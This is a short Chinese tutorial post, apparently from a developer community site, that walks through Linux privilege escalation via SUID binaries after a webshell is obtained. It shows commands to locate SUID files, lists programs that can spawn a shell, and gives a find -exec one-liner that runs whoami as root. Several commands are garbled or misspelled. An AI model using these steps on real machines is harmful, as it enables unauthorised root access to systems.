linux 提权SUID
SUID的原理就是将某个命令提升权限,当普通用户去执行时候,可以达到root命令执行的权限。LinEnum 查看suid 的文件(Linenum使用记得chomd 777)1.拿到webshell后上传脚本linEnum 探针是否有SUID。查看到可以使用suid漏洞的命令 find。以下是一些可用于产生shell的程序。2.使用find命令进行提权。如果直接whoami。
·
SUID的原理就是将某个命令提升权限,当普通用户去执行时候,可以达到root命令执行的权限
环境:centos
1.拿到webshell后上传脚本linEnum 探针是否有SUID
LinEnum(工具) 查看suid 的文件(Linenum使用记得chomd 777)
手动:
find / -user root -perm -4000 -print 2>/dev/null
查看到可以使用suid漏洞的命令 find
以下是一些可用于产生shell的程序
namp
vim
less
more
cp
nano
mv
find
2.使用find命令进行提权
touch yx1find yx1 -exec whoami \;
root权限。
如果直接whoami
用户是yx。
华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。
更多推荐
0
0- 0
已为社区贡献1条内容
所有评论(0)